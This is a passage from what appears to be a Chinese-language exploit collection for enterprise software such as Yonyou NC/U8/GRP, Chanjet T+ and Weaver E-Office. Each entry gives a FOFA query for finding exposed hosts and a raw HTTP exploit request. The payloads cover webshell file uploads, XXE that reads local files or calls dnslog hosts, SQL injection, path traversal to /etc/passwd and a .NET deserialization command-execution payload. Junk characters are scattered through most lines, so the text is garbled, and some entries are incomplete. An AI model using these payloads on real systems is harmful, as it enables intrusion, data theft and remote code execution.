Host: 203.25.218.166:8888, p# M# ` [( [, M( |; v" q
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
; C0 A4 ~+ B+ p- [) O4 FAccept-Encoding: gzip, deflate
: W" `+ e+ {& Q: [% k9 [Accept: */*
+ E' c# x7 E" ?. ?8 Z! a# s2 VConnection: close
3 K1 t6 V S& z* a4 K4 G: FaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
( s$ X i2 f2 l% V: GContent-Length: 190
9 p* N4 G1 P, F: uContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0/ { x7 l* x( o* V
0 l2 S2 P( ^" y, `3 L5 }* B--fd28cb44e829ed1c197ec3bc71748df0
4 m3 G( R ^1 F. ~Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
6 N3 Z; f1 o! a; ?$ v b" B# t
5 n, G8 R- i: @/ j<%out.println(1111*1111);%>$ h0 R- X# |% D- ^8 B
--fd28cb44e829ed1c197ec3bc71748df0--
+ N! n& I$ l+ w* z
" ^$ N0 S! v# v0 l$ ^6 m, l, g* T4 O" z/ _% ]6 {
36. 用友NC-Cloud soapFormat XXE& R4 ^$ Q" f. u: E- V# h4 t4 O
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
) Z& o" n+ L. l- B3 H; S( ^POST /uapws/soapFormat.ajax HTTP/1.18 V0 \/ U% ]" f
Host: 192.168.40.130:8989( L+ {) P: _' ]' a% p. @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0) a% [! j D: w7 Q2 o
Content-Length: 2639 r) E$ b: u% n, m% H9 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' ?: r3 `+ g' T2 PAccept-Encoding: gzip, deflate
5 S4 {+ Y. P9 x9 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 H5 S/ b1 R* G& E, K1 ?4 ?
Connection: close7 y6 Q) t- p# D" N, V5 b
Content-Type: application/x-www-form-urlencoded
- m) Z5 ~4 i% w; PUpgrade-Insecure-Requests: 1 M# G9 i! t8 D" e( ?
6 j4 c; c; j, s, n) K5 O5 R% f
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a* C& I8 S1 ^8 T
\! n8 K0 ~0 d9 W3 q/ D: U# N" y) a9 \" O7 f8 G9 ?
37. 用友NC-Cloud IUpdateService XXE y p) j# `4 k& w2 a' s
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
4 F% x/ o1 d" i3 U# [POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
* V; b" q3 L( N+ e6 |Host: 192.168.40.130:8989
( w, ]! M8 ^1 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
1 t" {2 J, I$ |/ D% o, t$ VContent-Length: 421
" X6 A# e7 e8 l* \' uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! ?2 b! q( [: h. \: o/ XAccept-Encoding: gzip, deflate: U3 p& E& V6 f$ D, D: _. w
Accept-Language: zh-CN,zh;q=0.9
1 I. m% ~; d- `; M% S7 FConnection: close- y$ b+ j w4 C* U' ?& v
Content-Type: text/xml;charset=UTF-8$ M3 S0 v7 _8 `- ]& O# H }5 L
SOAPAction: urn:getResult
+ y$ s' k) }% M$ E8 L+ XUpgrade-Insecure-Requests: 1
. o: \/ U* f" H1 y( @
; v7 }- N' ]# ^% V) H<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">+ d) d8 r& ]" C8 a, O
<soapenv:Header/>
( O. Y3 t1 [9 u2 |( j1 ~<soapenv:Body>
, R" {8 _1 P' ~+ s. Y9 @; g& C<iup:getResult>9 R9 Z$ b1 {* S3 H
<!--type: string-->
9 ] U8 k+ |4 ?1 y2 ?1 m<iup:string><![CDATA[% o2 f9 ?3 E* O( U
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
6 Y" } F6 m) N! P<xxx/>]]></iup:string>* B5 A6 e3 E8 \: e- Y+ ]
</iup:getResult>
4 J7 ~5 ~9 Z0 r% q</soapenv:Body>
( X; m/ @: [1 h; u0 {</soapenv:Envelope>- u5 X$ X- N& [% ^. R
! x& {( _" G+ Q+ h6 J: |
5 }( L0 ^* V% f; C5 F" I6 K- P7 U) `% x) R$ o$ f
38. 用友U8 Cloud smartweb2.RPC.d XXE& U% p+ [' t8 l5 g8 e
FOFA:app="用友-U8-Cloud"
+ r) D, d, Q6 o7 a7 ]POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
0 c3 o5 W, e; K: w& n9 x. {7 JHost: 192.168.40.131:80886 R9 u& B9 o) n0 a; ]7 B5 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
( c3 }6 P* R. k: B2 Q, fContent-Length: 260
" @" \6 l ~. a% Q$ O \& @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3( j8 Y8 `; e5 V* P5 a* _! w9 Z" a
Accept-Encoding: gzip, deflate
0 n+ E) w8 v0 @8 l% `1 j6 K% e1 fAccept-Language: zh-CN,zh;q=0.9
* y( A9 k# j3 X" A$ rConnection: close
7 n% N# G' ^" s* W$ x7 {1 l: AContent-Type: application/x-www-form-urlencoded& t0 V6 b$ }& Q% u* B
% s* d" M( g) |" y" r- O__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>& O$ R0 }2 X# m! r
, t% |3 |3 s) g6 {4 C. x1 a
4 r! Y; c8 Q8 H0 O8 r% O% v39. 用友U8 Cloud RegisterServlet SQL注入! d% W5 n# L0 u% v% u- E/ F
FOFA:title="u8c"
! I# b0 C) R& @7 Y2 K6 P4 i: o& tPOST /servlet/RegisterServlet HTTP/1.15 Q& s# G+ e: v) K0 q
Host: 192.168.86.128:8089
; \# V' k w2 L( E5 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
% C4 x6 Z- r' u( T! ZConnection: close+ ^7 K5 C5 _ F- U
Content-Length: 85
1 K) \! Z0 F6 @0 Y( J% QAccept: */*' h1 A* G2 W3 [- c5 q$ Z
Accept-Language: en2 L7 p8 Q& G" N# O% q/ O2 {
Content-Type: application/x-www-form-urlencoded* A3 |& ]" H4 R2 |! a
X-Forwarded-For: 127.0.0.19 i# V- e. g0 P& z( S6 k) m* |- F
Accept-Encoding: gzip2 b% K7 J# f/ |7 u5 s
, ?* N" |9 W+ M! Z- j9 cusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
& U: \. Z. ^- s* }( E' ^2 g8 r2 E( l l* M5 g M: A) l
- T! ~9 f& \6 \6 m* V9 o3 `40. 用友U8-Cloud XChangeServlet XXE
3 W6 _( `. D4 K) y7 N& b) W6 MFOFA:app="用友-U8-Cloud"( R. H, I4 b5 b$ w* |, L8 Y
POST /service/XChangeServlet HTTP/1.1. \+ g5 [' t/ J! K9 r" u
Host: x.x.x.x4 l+ y- j6 f6 y0 P V3 e! [! E
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 p; s. p$ G5 x) U: dContent-Type: text/xml
% q/ b6 V$ {. u8 dConnection: close$ P/ `" @4 y; o% W+ g! J
8 S$ J) y& k- \* [$ ^<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>1 y* u1 ^# h3 ^: v, ~ A
; G b! @8 ~7 z- c7 m( E& J% ]
9 J, ~; z6 G, N4 k0 S4 c1 V41. 用友U8 Cloud MeasureQueryByToolAction SQL注入+ h$ Y* z7 I4 b1 W# z0 `* y0 n& P
FOFA:app="用友-U8-Cloud"% e. g7 H" t9 _& r2 u: L. @) C
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.14 i# Q G- u: w* B
Host:3 b- B5 ]8 J) T, k6 I2 u6 J8 k# B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 g3 v) s/ T- Y$ KContent-Type: application/json
% O I& I: O7 M$ U) ?Accept-Encoding: gzip
2 J8 C( ?* u- l& k& ]Connection: close
9 ~% R1 K$ u, V) W$ _3 `7 V& c) x7 A
& D5 b/ t$ p6 {( o _* q
42. 用友GRP-U8 SmartUpload01 文件上传# t* m& J, W: Z) ^! U# V
FOFA:app="用友-GRP-U8"- P4 `+ m# f: x8 P* M8 B
POST /u8qx/SmartUpload01.jsp HTTP/1.1- W2 e; [! _ J! f. j! H y
Host: x.x.x.x
& ^& u* ^. D. Z' Z t& T9 O% T/ cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
6 F1 h3 ~' M& R$ [; ]6 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.360 G9 r# t# ~% Q5 @- z" u/ `
+ C: f* R1 k+ M, m
PAYLOAD
1 ]. l3 ?8 T) l |+ q$ u9 b
1 h7 ]) y6 O: @, `4 t$ P. z f4 k1 T0 O, Y
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml( i5 i1 s& g8 \% t
2 M& d2 b( U% t- `7 d43. 用友GRP-U8 userInfoWeb SQL注入致RCE
: y* L$ |0 F* _) N* E5 WFOFA:app="用友-GRP-U8"
0 b/ X" K* H/ O( q3 ], O3 z4 @POST /services/userInfoWeb HTTP/1.14 W2 Y% J5 L6 K$ V' l4 h
Host: your-ip% ]& s+ S7 f! v0 ], l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36- Z' ~' p) \- Z: d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' Q2 b% G, G5 ]0 VAccept-Encoding: gzip, deflate2 J: G Y6 \/ q; T" J. P
Accept-Language: zh-CN,zh;q=0.9
4 M9 F: S6 H6 Q2 HConnection: close+ _1 j9 o: u9 Z; G* @
SOAPAction:/ }. j' ]$ w! |
Content-Type: text/xml;charset=UTF-8
w( x* t( v' B0 i9 j2 o# P: X
7 K$ K# }8 H$ v- p4 h; y' j5 c. H<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">& b# }7 P- Q( ^" s
<soapenv:Header/>
9 P) p/ ]- G# \1 G( L- z <soapenv:Body>+ `" w6 b( p7 A+ H! A g
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
/ a! _( b. W0 B <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
Q e& v1 m: c( b! [ a </ser:getUserNameById>0 L) t4 M1 q4 ^
</soapenv:Body>
" _5 ?5 d0 ~3 x4 | F</soapenv:Envelope>* v& E' N9 o) h. h* [
! L2 H% c$ C( D: w
/ U$ ^/ i0 q% Y) `/ [9 t: R r
44. 用友GRP-U8 bx_dj_check.jsp SQL注入- p5 @6 u- ~" |- d$ t: f
FOFA:app="用友-GRP-U8"
" T7 K- n7 f/ O6 r. N$ M5 SGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
7 {7 ]( ~. _/ [' l# |4 W2 PHost: your-ip
+ h( h! ?, s" D* w7 A4 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.367 W0 F5 \) n6 y! U( Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
{4 d" i; d+ B4 [Accept-Encoding: gzip, deflate0 q. j$ \. m( \+ j9 s! R: t* h
Accept-Language: zh-CN,zh;q=0.9
- H6 l: ^, h* N) w! ]3 o: dConnection: close1 f) d! `: W7 H
0 ~3 B( Q6 q3 h- s* z* \' d) V4 S* h' [( H- Z, `' l! R
45. 用友GRP-U8 ufgovbank XXE$ ^8 ?. M+ r q" u
FOFA:app="用友-GRP-U8"
* J6 s9 J" R' g! d, TPOST /ufgovbank HTTP/1.1
/ {2 r+ o" ^4 IHost: 192.168.40.130:222 j- z- g6 Q$ s: ?/ z" X q/ R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
* q( m# _2 W. J0 lConnection: close9 L1 n8 j: z* A3 s/ x
Content-Length: 161
+ Q) i" q' E" d# cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) F: h& B( m0 Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' q+ Q; ?5 ~4 A* ]
Content-Type: application/x-www-form-urlencoded
U6 p4 k; j% N7 _# j' mAccept-Encoding: gzip
# A J) Y( g3 Q) |4 s: V* R( ?* ^ e
reqData=<?xml version="1.0"?>& a" d! T6 K! x$ \
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
" q5 X7 \( o0 U) H
$ d2 z4 a. r- j' Z; W% U# y. G% C. [# M& H& C$ N2 O
46. 用友GRP-U8 sqcxIndex.jsp SQL注入& c2 a( L: L9 i1 Z
FOFA:app="用友-GRP-U8"
: v+ e! o E; y/ B I' {& r' KGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
2 `( C0 j* w& m. C3 V5 T3 D' E) P wHost: your-ip* q0 i6 }- D) T4 M1 F5 r3 n( S/ O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 H% S+ j) W9 g: G# l7 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 K# K" @$ z6 U) z* r% FAccept-Encoding: gzip, deflate- e6 A% t% e! V6 u+ [9 ]8 u
Accept-Language: zh-CN,zh;q=0.9: c7 Q( j) Y$ U6 R8 `4 p' V
Connection: close/ c! p; G. M9 H4 `% ]/ V6 w
+ }9 ]# Q) i% `
' p' y9 U3 i. f! ]- M, r6 v9 q9 S" n
47. 用友GRP A++Cloud 政府财务云 任意文件读取/ v _; ?: G- N! ]$ S6 L- c
FOFA:body="/pf/portal/login/css/fonts/style.css"1 _* ?& t: t. `4 s1 S. r, B1 \2 B
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.12 [. t# f) z1 B6 q9 D5 j) E0 r; p5 {
Host: x.x.x.x0 `! N' r3 n' G) W) B
Cache-Control: max-age=0
( Y2 y" M1 Y* R3 y: l- O0 _4 \5 VUpgrade-Insecure-Requests: 1. U9 |4 ~! N/ @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 {: W* y6 K5 x$ O% W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 O2 v4 n# L- g. {' i; S9 _: oAccept-Encoding: gzip, deflate, br$ B& d( F% k0 _
Accept-Language: zh-CN,zh;q=0.9
& n# s) |7 q8 N! ~6 {If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT7 Q$ L! l [" F" W* w
Connection: close- }5 m6 S. G" _- Z( X" f
, r$ M- X5 [/ Q t3 z! t+ `; u T
* N/ d6 R( B+ y0 w, g
$ F' `& z. f v, h) C# @48. 用友U8 CRM swfupload 任意文件上传
: {8 X! q1 D! ?1 y& N( [FOFA:title="用友U8CRM"
8 B+ p7 v, X& W- P# k" KPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
7 v0 o" {( L. GHost: your-ip/ h9 e, f: V0 o! Y, f" d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ G) o! I2 J, h jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 O6 B& e7 E' f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 q f' y: J2 V1 e, @* AAccept-Encoding: gzip, deflate
. p3 H8 g: H5 W! l+ j4 Q5 rContent-Type: multipart/form-data;boundary=----269520967239406871642430066855# M" K; q, E# [9 \0 ~7 ]& o8 o) }
------269520967239406871642430066855
8 L7 b$ _7 z8 L5 d% W+ [Content-Disposition: form-data; name="file"; filename="s.php"8 r+ e5 W3 j1 {. u( s
1231( y/ s& `. A" O# o I1 o# N9 B
Content-Type: application/octet-stream# q. w4 k. ?8 w5 ]7 Q1 v! Y
------269520967239406871642430066855' }. R/ ?, S2 s, h& I y" m
Content-Disposition: form-data; name="upload"
: e0 S9 H0 m! ]7 y% \upload i1 v: K0 L; w" }2 a0 N
------269520967239406871642430066855--7 X2 e" j9 T# L& R/ M l. D
) V* O6 g& L2 d/ N. y
0 d4 G* s! U% \
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
: Z% J+ R, j ^# V4 w* K: D: ?FOFA:body="用友U8CRM"% f" [1 }- c0 v3 V
9 m9 ^# z: v& A9 z; F# i
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1( h5 r1 k; M' a. i& G' W$ \$ |
Host: x.x.x.x
# h# {: p' K( l4 l- E* W/ M+ T. kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: w5 t8 n+ V% A; w# T
Content-Length: 329# X. n8 Q7 E3 X% k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; I" y, [4 F' n& @
Accept-Encoding: gzip, deflate9 P7 i6 r. n' k, {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Z7 ?5 p% S$ r9 z- \$ b% X
Connection: close8 Y" e8 l7 X8 l- e' Z' J& \
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w: i5 x/ ^6 @ J' U; m$ E6 _
; ]2 W6 a0 R, s# a9 |
-----------------------------vvv3wdayqv3yppdxvn3w4 y3 q8 x6 R7 ^
Content-Disposition: form-data; name="file"; filename="%s.php "1 w# d8 J' A7 c
Content-Type: application/octet-stream
1 k ?. N4 y+ y/ A, j4 E; p: t# z+ F- n; D! @9 ]+ p4 c
wersqqmlumloqa7 t& m5 h* v7 p
-----------------------------vvv3wdayqv3yppdxvn3w
5 G: A& [# ]& F' F% aContent-Disposition: form-data; name="upload"
& U! u3 t# @1 d8 S* h* `% ^: T5 ~, B+ m. E
upload( P' D% P% S( K G
-----------------------------vvv3wdayqv3yppdxvn3w--
* s: s- y7 v% L9 J' O7 f8 k6 N! }9 y% E- x# \
5 s- q8 Y( L, {http://x.x.x.x/tmpfile/updB3CB.tmp.php
8 C; f. Z/ O3 O/ c3 b2 b
7 Y+ g1 Q! l7 i0 J9 E! F5 c50. QDocs Smart School 6.4.1 filterRecords SQL注入+ Z* {$ ~8 v2 p
FOFA:body="close closebtnmodal"
/ \' Q" a# m: K& I1 `! rPOST /course/filterRecords/ HTTP/1.1
- O! S, ]" }/ {! V- ?Host: x.x.x.x
& ` B& s9 @) @" d& hUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" Z4 P" W! j4 I, Y% K
Connection: close1 ]1 `: b: c2 f( U, v
Content-Length: 224. H V d' X+ ?. I1 N6 v* E
Accept: */*
) e q. `/ O- s& x4 ~) A- }Accept-Language: en* g @- T& I: F, w& r; s
Content-Type: application/x-www-form-urlencoded% s9 k; _ m7 m6 Y
Accept-Encoding: gzip
! R' n' {4 Z! D. Z' R; y* f* Z0 w! x" P. I4 N' c
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
q3 P$ r. ~: S# g B9 h: `
5 |3 t, b# K, A9 I8 Q. V2 s; E5 ]3 P6 T6 L% r+ Z! ~: _3 D
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
$ _. t. G" j8 C) j1 Q1 x& r- D" Q2 EFOFA:app="云时空社会化商业ERP系统", B& L- a. v) k A0 i1 f
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1" T! p& }- ?& x8 k% E# E6 h8 W2 N& c8 I
Host: your-ip3 [5 i& Z! Y% O- J+ \) v- ^+ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36* ~5 D# J' w/ O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ i3 e$ `/ ?4 b; \Accept-Encoding: gzip, deflate
5 F# G5 i( x) W& N, ]2 d# fAccept-Language: zh-CN,zh;q=0.9
# Z( W, E# k5 T3 ?0 K# d* uConnection: close/ |4 D+ d: v/ ?) P1 d
+ U' n- b" M' V
4 i! {; ^# H: C* H! @4 y8 D' H52. 泛微E-Office json_common.php sql注入; Q- c+ T/ u) C7 w" K
FOFA:app="泛微-EOffice"1 F0 t2 K4 f0 D$ l- `- o
POST /building/json_common.php HTTP/1.16 o- V* B9 k) L
Host: 192.168.86.128:8097
- h- |# M8 [; S2 d6 A0 ~User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 c" X& u8 L% U' m* C d! D1 VConnection: close6 R" B9 y) }7 K0 n6 Z% C
Content-Length: 87
4 }0 P( v, V3 Z% Y- DAccept: */*
1 P& y: ] U7 W3 MAccept-Language: en) z6 v. e. x) N
Content-Type: application/x-www-form-urlencoded
3 F, y" H/ b: p4 j8 yAccept-Encoding: gzip
2 ]2 y& y; Z% u6 l6 ?% K# d3 D( u- q6 w) Z* s, q
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
8 c. A7 t4 o% \1 I: I& O) h
8 E$ K+ G9 i' |! S n$ ^& O% s& e+ F0 w- w4 j1 x3 i- Q
53. 迪普 DPTech VPN Service 任意文件上传$ Z0 e$ i. G2 l7 g6 X. @
FOFA:app="DPtech-SSLVPN"2 j5 {6 p- ~8 G. s* T$ |- W! E
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd5 \* S2 j4 @" \; v& m1 u7 T0 Q
* J. h. g, E( S) U! k! H- m% _& f) i* s) h5 R! {: O, M
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
6 ` Q9 p$ h$ s, ~7 |FOFA:app="畅捷通-TPlus"/ \8 A0 |5 j% J
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件3 {4 k; \" t' V2 k3 r. [# r, Z4 `
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
5 A/ h T7 U5 ^7 n
+ k' E2 i% R$ S5 \5 L) o5 f" W; q" \
3 k7 y; G. s4 @ r9 F完整数据包& w5 {/ {) ~. P1 }' S0 v
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
: q) R2 S; G* h& m% H% ?Host: x.x.x.x. `3 \9 I- O4 D, i1 w3 Q1 n
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
& s# x8 [. X5 f' I) I4 oContent-Length: 593; H7 ]- M+ s8 j' V/ ?
1 l; h9 P. \7 N/ @) z{# k8 o. R& ^" r) Y. Z
"storeID":{5 l% _, ]4 Y1 ~ \ `$ ~5 R
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
& Y s9 m- A4 S/ o "MethodName":"Start",4 ^7 w% j! h4 R8 J, G: V' `4 T
"ObjectInstance":{
1 P( e' G" Y1 J2 J2 L" T7 E; ?4 d "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",/ X" y2 K# g( k+ N% T4 T
"StartInfo":{
6 ]! }& d- v0 y8 { "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 B: q) U5 o5 n2 [/ p8 N& H
"FileName":"cmd",% g9 `" W( w2 P) B
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"- G1 R8 ~! a2 C" K k
}& j, e; K+ N! J5 ^8 C8 s0 G
}2 I$ q* _; ]! S' Z
}' ?( @3 s+ n8 N( e% s
}
" R0 X* |2 G8 }) H
; s/ e3 B5 r( r! e& m/ N, n, m) E3 W- u$ C8 m+ c3 s( ]
第二步,访问如下url
8 V; v. E; n$ `# f9 I/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt3 B6 H/ e$ R# K( U' `- ]% X
1 o9 s q% D! }# j d) T' W! `
& n) k1 Y; {" H H; t1 Q( j55. 畅捷通T+ getdecallusers信息泄露' Z) {1 |" Q; F& r: {3 f% _6 A
FOFA:app="畅捷通-TPlus"5 g8 |5 M! H4 Q# @
第一步,通过
7 a; l1 \1 c* i' F; p5 [1 {& L/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie7 v$ R! K. Q. Z* C, X+ f6 J) o. }9 O
第二步,利用获取到的Cookie请求
8 d$ W. [7 x/ X& X Y! N/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers7 s' v4 c6 }; Q$ |* b. s. N% a4 _
; O3 h) `1 S+ p* T
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
8 k+ J. _' q" T* B" ^% G% RFOFA: app="畅捷通-TPlus"
9 k9 P; ~$ {- g5 f4 o- [' GPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1: C. v& y+ S% L- k4 B" V
Host: x.x.x.x
2 Y8 |& S' A3 u6 J5 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
@" ~; }2 l. U9 ^7 a5 k, oContent-Type: application/json/ a3 m: g! \9 @/ t/ w
